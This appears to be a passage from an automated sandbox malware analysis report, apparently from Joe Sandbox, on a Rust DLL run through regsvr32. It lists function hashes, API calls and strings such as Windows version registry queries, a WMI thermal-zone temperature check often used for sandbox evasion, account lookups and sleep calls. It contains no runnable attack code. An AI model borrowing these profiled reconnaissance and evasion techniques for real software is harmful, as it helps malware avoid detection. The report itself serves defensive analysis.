                                                                    • API ID: Handle$CloseFile$CreateErrorInformationLastMappingView
                                                                    • String ID:
                                                                    • API String ID: 2964106993-0
                                                                    • Opcode ID: 46c435033f59a7bf043528f6e285008444851c04b5c2a5e6632f5bc58c1fef0e
                                                                    • Instruction ID: 0e0a40be59b969dd7d0826ee0f6259cddbd7414fd54d920aa17d77e4f6cca2aa
                                                                    • Opcode Fuzzy Hash: 46c435033f59a7bf043528f6e285008444851c04b5c2a5e6632f5bc58c1fef0e
                                                                    • Instruction Fuzzy Hash: DD618026B1A74389FB14EB52A468BAD67A0FF45B84F588035DE6C47BD9DF3CD4428700
                                                                    APIs
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 00007FFDFB222C1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Close$QueryValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                    • API String ID: 2393043351-1421764643
                                                                    • Opcode ID: 37bdbc64dc4ee0f6554d1c47c5daf685297dccc14b4500a23452d55a4f32dc48
                                                                    • Instruction ID: 59038edde3e856e6b07de7f313aaf5a8e65ef59d1139074e6086d5473cc22b92
                                                                    • Opcode Fuzzy Hash: 37bdbc64dc4ee0f6554d1c47c5daf685297dccc14b4500a23452d55a4f32dc48
                                                                    • Instruction Fuzzy Hash: 90B1A56270E64281FB60AB11E460B6AA7A1FF857C4F948035EE9D87BEDDF3DD0458B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$Alloc
                                                                    • String ID: SELECT * FROM MSAcpi_ThermalZoneTemperature$WQL
                                                                    • API String ID: 986138563-2989581318
                                                                    • Opcode ID: 658a9729fa7da1c980123d83f3d7fafd5fe1a0a70849b059b14dfac0b28b85ee
                                                                    • Instruction ID: 616835a12d8fb6f6f24c543b5aca1d31447442c7ee8241d1dcb36b295f89f9e7
                                                                    • Opcode Fuzzy Hash: 658a9729fa7da1c980123d83f3d7fafd5fe1a0a70849b059b14dfac0b28b85ee
                                                                    • Instruction Fuzzy Hash: 51515122709B8692E720DB11F4207AAA7A4FB85798F544134EFED83AE9DF7CD584C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                    • API String ID: 3510742995-3535459961
                                                                    • Opcode ID: 3147cd9bec5455f8381a4590b6d458bf6c2bccac19a2f16f1c716521a064f311
                                                                    • Instruction ID: 6a608465f365438b06229ac2e42afb6d7e5d7365ad44340c6bbb87cde1ecd3d3
                                                                    • Opcode Fuzzy Hash: 3147cd9bec5455f8381a4590b6d458bf6c2bccac19a2f16f1c716521a064f311
                                                                    • Instruction Fuzzy Hash: 5F918F22A05BC6C5E711CF25E8517F933A4FB58788F508222DE9C577A9EF39E296C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Group$BufferEnumFreeInfo
                                                                    • String ID:
                                                                    • API String ID: 1408970584-0
                                                                    • Opcode ID: de2e23d406a60351ee1f1488efb2de6b994ec15f20dea07c54d47d376994b3cc
                                                                    • Instruction ID: 48c666a82e22dc01541fe64f6520c00c73bcb45554404544d046c8e538a6576f
                                                                    • Opcode Fuzzy Hash: de2e23d406a60351ee1f1488efb2de6b994ec15f20dea07c54d47d376994b3cc
                                                                    • Instruction Fuzzy Hash: 6A616F2270EA4286FB609A15E550B6AB7A0FB85784F944035EEAD877FCDF7CE841C740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$realloc
                                                                    • String ID:
                                                                    • API String ID: 3347955621-0
                                                                    • Opcode ID: 30e183f32c5a1b91f64513b32134c7c85a39b5a2d9b63cc12b0367f48bc863b8
                                                                    • Instruction ID: 5d1e1f517c9d6e69941d12a8804b035abf47bf878497e9fd80cf7ffb2f87f4b2
                                                                    • Opcode Fuzzy Hash: 30e183f32c5a1b91f64513b32134c7c85a39b5a2d9b63cc12b0367f48bc863b8
                                                                    • Instruction Fuzzy Hash: 1451E422B0A78782F710AB11E5507BA67A4EB84784F545134EEED47BE9EF3CE485C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CompareOrdinalOverlappedResultString
                                                                    • String ID:
                                                                    • API String ID: 1037094402-0
                                                                    • Opcode ID: b5b8a6445f965e287ab3a70ddeb87559af975b7d62a191e1c959eff2ef60592b
                                                                    • Instruction ID: da2bf30532a8db291271a12c700e1c2f7f9a4f84ef8b8dd61c155c1b60ca285e
                                                                    • Opcode Fuzzy Hash: b5b8a6445f965e287ab3a70ddeb87559af975b7d62a191e1c959eff2ef60592b
                                                                    • Instruction Fuzzy Hash: BB419136B0AB429AE714AB11D8607BC27A4FB48B88F544131DE9D877E9DF7CE542C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: BufferFree$Return$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3486352366-0
                                                                    • Opcode ID: 0c16cb222a3a48fd4da08c14caa007e5563a0fc06241afcabd18d8df6be5f5aa
                                                                    • Instruction ID: c740ff6684da62050c09a975f4befe7c6a31ca1af4f4eef6383966648e79751a
                                                                    • Opcode Fuzzy Hash: 0c16cb222a3a48fd4da08c14caa007e5563a0fc06241afcabd18d8df6be5f5aa
                                                                    • Instruction Fuzzy Hash: 70219215B0F54742FF24AA5E9460AB96290AF85BC4F884935EE7DC7FE9CE2CE4428341
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: BufferFree$Return$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3486352366-0
                                                                    • Opcode ID: 90e61ff390e64d9a7f70382ec595c1ca15daf3d469f168c875f0c8e9d41fb5f6
                                                                    • Instruction ID: 2042bab35f1bfc68255f706b338404efed52da62ed97ed1f0ac73b6b0d1e9a63
                                                                    • Opcode Fuzzy Hash: 90e61ff390e64d9a7f70382ec595c1ca15daf3d469f168c875f0c8e9d41fb5f6
                                                                    • Instruction Fuzzy Hash: A6115415B4F58741FF24AA5A94609B95250AF85BC4F480535DE7DC7FE9CE2CE4428341
                                                                    APIs
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 00007FFDFB22224B
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                    • API String ID: 3677997916-1421764643
                                                                    • Opcode ID: 0fda1c673ceca58a43ee99b34e4de1fe7cf74656078fc208c6b6d16f2b320241
                                                                    • Instruction ID: 13afd691cc1d10734d033a8a9809d06402aba43130bb86101a399cf63c2ca059
                                                                    • Opcode Fuzzy Hash: 0fda1c673ceca58a43ee99b34e4de1fe7cf74656078fc208c6b6d16f2b320241
                                                                    • Instruction Fuzzy Hash: DE91827270AB8285EB60AB15E4507AAB7A4FB80780F905135EEDD87BADDF7DD144CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: CCG $TSUR$TSUR
                                                                    • API String ID: 3997070919-4029986600
                                                                    • Opcode ID: be21714f870a850417e1f2207fbd5bcc78359ae89a568a8ef9cec64fd3aff9e3
                                                                    • Instruction ID: 1c28ff365d7dd7312d5936c93d9bddf86ee10a9c27c4170ca7b790d2f0842abe
                                                                    • Opcode Fuzzy Hash: be21714f870a850417e1f2207fbd5bcc78359ae89a568a8ef9cec64fd3aff9e3
                                                                    • Instruction Fuzzy Hash: B831C322F29B8682E714DB5598106F92760FFD9B84F45D235EE9D437A4EF3891E5C300
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Components$assertion failed: is_code_point_boundary(self, new_len)$exe\\.\NULexit code:
                                                                    • API String ID: 0-953524122
                                                                    • Opcode ID: 7d4296cb1a4e65ccedb1eee6053b9f0395c84f6846f89eec99184c3211c2cba0
                                                                    • Instruction ID: ee76671458da2ba655f13a69df5f99c602c1b97df47be3b7845ab015edef8f29
                                                                    • Opcode Fuzzy Hash: 7d4296cb1a4e65ccedb1eee6053b9f0395c84f6846f89eec99184c3211c2cba0
                                                                    • Instruction Fuzzy Hash: C0B1D571B0BA5385FF55AB6194A4AB92691BF04BC8F048835CD2D977FDEE3CE44A9300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AccountLookup$ConvertFreeLocalString
                                                                    • String ID:
                                                                    • API String ID: 2884463747-0
                                                                    • Opcode ID: 160e9365936cf7a0d4c89d484a12c7d80f063699b75887e0aac085e33207f3b9
                                                                    • Instruction ID: c3dd5a5d9de6ce03d501793b72ac9d325f1d55f0f9df79f5fa2344bccf7dcc3e
                                                                    • Opcode Fuzzy Hash: 160e9365936cf7a0d4c89d484a12c7d80f063699b75887e0aac085e33207f3b9
                                                                    • Instruction Fuzzy Hash: CC816A3270AB4292EB209B51E460B6AA7A0FB85784F540035EEDD87BEDDF7DE441CB40
                                                                    APIs
                                                                    Strings
                                                                    • attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs, xrefs: 00007FFDFB2073D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: attempt to join into collection with len > usize::MAX/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\str.rs
                                                                    • API String ID: 3510742995-1099963043
                                                                    • Opcode ID: d820e826a8be504fb17af10a82aeed62ca364efd42daaf38244ac31e4559b07e
                                                                    • Instruction ID: c831cf17ae09383005166c8c1b3b0dde67772f0b81489b20056a7a24d9ae129b
                                                                    • Opcode Fuzzy Hash: d820e826a8be504fb17af10a82aeed62ca364efd42daaf38244ac31e4559b07e
                                                                    • Instruction Fuzzy Hash: 2061B436B0AB8685EB109B15E4547A96760FB95BC4F588131DEAC877F9DF3CE145C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep_amsg_exit
                                                                    • String ID:
                                                                    • API String ID: 1015461914-0
                                                                    • Opcode ID: b641bfed71cacac4c60620ca17e9b895a375f51facf368f8d736af88659ae333
                                                                    • Instruction ID: 724aeacef76b5512b3434c40bbb978cabd227a64b55bc9a7ee821d9b4bc5202f
                                                                    • Opcode Fuzzy Hash: b641bfed71cacac4c60620ca17e9b895a375f51facf368f8d736af88659ae333
                                                                    • Instruction Fuzzy Hash: 05415B30B4A64786F715AF15E861B7966E1AF48BC5F484031EDAC877FCDE2DA8419340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$ObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 2593906732-0
                                                                    • Opcode ID: 92093e7900d96d8c4880aaba8b248f3d7dcf9c291f38ffbdd6ee0855f602c98c
                                                                    • Instruction ID: 9edb9b2e317254a739193c82e6df0b3fd873f513ac5bdb92628f687c517e7d5d
                                                                    • Opcode Fuzzy Hash: 92093e7900d96d8c4880aaba8b248f3d7dcf9c291f38ffbdd6ee0855f602c98c
                                                                    • Instruction Fuzzy Hash: 9321D152F0EA0306FF68A6292925B7945861F853E4E089232AD7E86BEDCF3CE4424201
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID: CriticalTripPoint$CurrentTemperature
                                                                    • API String ID: 1473721057-3920528518
                                                                    • Opcode ID: bc35f46b402e4f932862f10ef7ba6f6f5aa6a836c14b0d86b4fd00ff7f7dea13
                                                                    • Instruction ID: 5aaab317d77dc5d698e5fe88417e4b217dd8daec4074f84726172b08c5de9063
                                                                    • Opcode Fuzzy Hash: bc35f46b402e4f932862f10ef7ba6f6f5aa6a836c14b0d86b4fd00ff7f7dea13
                                                                    • Instruction Fuzzy Hash: 3D91AA32B1A68292FB61DB24E4647AAB390FB84344F505135E6AD82AFDDF7CD185CF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
